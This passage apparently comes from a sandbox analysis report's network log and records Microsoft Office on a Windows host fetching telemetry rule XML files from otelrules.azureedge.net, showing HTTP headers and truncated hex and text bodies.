                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                        x-ms-request-id: 42f51266-b01e-0021-80fe-41cab7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114835Z-174f7845968xlwnmhC1EWR0sv8000000117g000000004k3a
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:36 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        87192.168.2.44983613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:37 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:38 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:37 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3342
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                        x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114837Z-174f78459688l8rvhC1EWRtzr00000000dzg00000000559q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:38 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        88192.168.2.44983713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:37 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:38 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2284
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                        x-ms-request-id: ab0c55e0-101e-00a2-20a2-429f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114838Z-174f78459684db9fhC1EWRc7g400000001eg000000002z6n
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:38 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        89192.168.2.44983813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:37 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:38 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                        x-ms-request-id: d8ac3bcc-601e-0032-16b2-42eebb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114838Z-174f784596886s2bhC1EWR743w00000011h0000000000qq0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        90192.168.2.44983913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:37 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:38 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                        x-ms-request-id: 83136512-401e-00ac-3a5a-400a97000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114838Z-174f7845968j6t2phC1EWRcfe800000011dg000000009y90
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:38 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        91192.168.2.44984013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:37 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:38 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                        x-ms-request-id: 2b15fac9-d01e-002b-104f-4125fb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114838Z-174f7845968j6t2phC1EWRcfe800000011h0000000006e1g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        92192.168.2.44984213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:39 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:40 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                        x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114840Z-174f7845968psccphC1EWRuz9s00000011k0000000008a9e
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:40 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        93192.168.2.44984313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:40 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:40 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                        x-ms-request-id: 47663499-e01e-0051-6891-3f84b2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114840Z-174f78459688l8rvhC1EWRtzr00000000dw00000000097t1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:40 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        94192.168.2.44984413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:40 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                        ETag: "0x8DC582BE6431446"
                                                                                        x-ms-request-id: 52878fcf-c01e-00ad-731d-41a2b9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114840Z-174f7845968pght8hC1EWRyvxg00000004ng0000000006p9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        95192.168.2.44984513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:40 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:40 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                        x-ms-request-id: 390894ac-101e-0017-4400-4247c7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114840Z-174f7845968xlwnmhC1EWR0sv800000011a00000000016t8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:40 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        96192.168.2.44984613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:40 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:40 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                        x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114840Z-174f7845968cdxdrhC1EWRg0en00000011800000000091fz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
